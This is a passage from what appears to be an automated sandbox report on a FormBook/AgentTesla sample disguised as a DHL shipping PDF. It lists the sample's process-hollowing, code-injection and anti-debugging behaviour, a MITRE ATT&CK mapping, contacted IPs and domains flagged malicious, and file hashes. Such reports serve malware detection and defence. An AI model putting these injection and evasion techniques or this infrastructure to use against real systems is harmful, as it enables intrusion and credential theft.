          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CCD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CCD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CDC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CDC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02D7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 6_2_02CBAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 6_2_02CF9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2B0000
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BAA008
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread register set: target process: 3352
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread register set: target process: 3352
          Source: C:\Windows\SysWOW64\chkdsk.exe | Thread register set: target process: 3352
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000007.00000000.354519919.0000000000B68000.00000004.00000020.sdmp | Binary or memory string: Progman\Pr
          Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.317115454.00000000011E0000.00000002.00020000.sdmp, chkdsk.exe, 00000013.00000002.564862839.0000000007480000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000007.00000000.367953216.0000000008778000.00000004.00000001.sdmp | Binary or memory string: Shell_TrayWndh
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Queries volume information: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe VolumeInformation
          Source: C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.DHL AWB# 4AB19037XXX.pdf.exe.12f2a8d0.2.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | DLL Side-Loading 1 | Process Injection 712 | Masquerading 11 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 712 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 13 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 11 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph, ID 491716. Sample: DHL AWB# 4AB19037XXX.pdf.exe; start date: 27/09/2021; architecture: WINDOWS; score: 100. Process chain: DHL AWB# 4AB19037XXX.pdf.exe started RegAsm.exe and conhost.exe; RegAsm.exe started chkdsk.exe and injected explorer.exe; explorer.exe started autoconv.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          DHL AWB# 4AB19037XXX.pdf.exe | 33% | Virustotal |
          DHL AWB# 4AB19037XXX.pdf.exe | 44% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          DHL AWB# 4AB19037XXX.pdf.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          6.2.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs


          Domains and IPs

          Contacted Domains


          Contacted URLs


                                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.thera.xyz | chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.discordapp.com | DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | DHL AWB# 4AB19037XXX.pdf.exe, 00000001.00000002.314610032.0000000002E71000.00000004.00000001.sdmp | false | | high
http://www.thera.xyz/ | chkdsk.exe, 00000013.00000002.564460482.0000000005A92000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown

                                            Contacted IPs


                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.15.197.14 | laliinparfumeri.com | Turkey | 201520 | DEDICATEDTELECOMTR | true
52.58.78.16 | www.thera.xyz | United States | 16509 | AMAZON-02US | true
104.21.5.62 | www.anushreehomemadeproducts.online | United States | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | dependablelawnsnow.com | United States | 15169 | GOOGLEUS | false
162.159.133.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
178.254.0.81 | www.lighterthanlight.net | Germany | 42730 | EVANZOASDE | true

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:491716
                                            Start date:27.09.2021
                                            Start time:20:33:47
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 9m 44s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:DHL AWB# 4AB19037XXX.pdf.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:24
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@7/1@12/6
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 63.2% (good quality ratio 58%)
                                            • Quality average: 72.2%
                                            • Quality standard deviation: 30.9%
                                            HCA Information:
                                            • Successful, ratio: 86%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • TCP Packets have been reduced to 100
                                            • Excluded IPs from analysis (whitelisted): 20.82.209.183, 23.10.249.43, 23.10.249.26, 23.0.174.185, 23.0.174.200, 20.199.120.182, 20.54.110.249, 40.112.88.60, 20.82.210.154, 20.199.120.85
                                            • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
20:37:05 | API Interceptor | 1x Sleep call for process: DHL AWB# 4AB19037XXX.pdf.exe modified

                                            Joe Sandbox View / Context

                                            IPs


                                            Domains


                                            ASN


                                            JA3 Fingerprints


                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL AWB# 4AB19037XXX.pdf.exe.log
                                            Process:C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1721
                                            Entropy (8bit):5.39127362806184
                                            Encrypted:false
                                            SSDEEP:48:MxHKEYHKGD8AoPtHTG1hAHKKPF1qHGiD0HKeGxHK3+vxpNT:iqEYqGgAoPtzG1eqKPFwmI0qeoquZPT
                                            MD5:A25F70EB14E27BADC54BCAAFD471B0D7
                                            SHA1:BAD9E4E87715827CBE362DF7A94785DC4591A83D
                                            SHA-256:C08CF4305521B0F463807E849D806B70D7073D70C8C3633AB4E347F041442080
                                            SHA-512:CD8E23EA50159382090433358A23C7D135333E3E1A13BE01C12136333CBE25C894D5768BD81A0910701A239F5583B8A17AECAD4F4F2EDCBC6C61F8041737725A
                                            Malicious:true
                                            Reputation:low
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\e82398e9ff6885d617e4b97e31fb4f02\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\f2e3165e3c718b7ac302fea40614c984\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5

                                            Static File Info

                                            General

                                            File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):4.498824246870166
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:DHL AWB# 4AB19037XXX.pdf.exe
                                            File size:11776
                                            MD5:690684b6b6a432ef5f8b34b67653d4be
                                            SHA1:34b072cdd785e0be9bf9717707a72c122ebf8e93
                                            SHA256:2ea667119c0aeda764dcb53a2adf480a26985bfc682949d0fb0c02d266342c68
                                            SHA512:b074acee0f6505a1c179af3149bc9146719b0df0bf6f0efa668d611ff388dc36f5cd7ed3c7c8a98317895ef716818ec0c3841ccff96aba0ba5ce8da15c0c6eb5
                                            SSDEEP:192:vXJJ/3Du6VyVt6TgAgoEwJnWO+Bh72Jkp/dq2bpKyS:hJ/3W6TgAgoEwJnWhzHp/dXpKy
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pa.................$..........~B... ...`....@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x40427e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows cui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x6150D8EB [Sun Sep 26 20:32:43 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al

                                            Data Directories

                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x422c | 0x4f | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x4c8 | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x40f4 | 0x1c | .text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0x2284 | 0x2400 | False | 0.377495659722 | data | 4.77728671216 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x6000 | 0x4c8 | 0x600 | False | 0.368489583333 | data | 3.66774301738 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            Name | RVA | Size | Type | Language | Country
                                            RT_VERSION | 0x60a0 | 0x234 | data | |
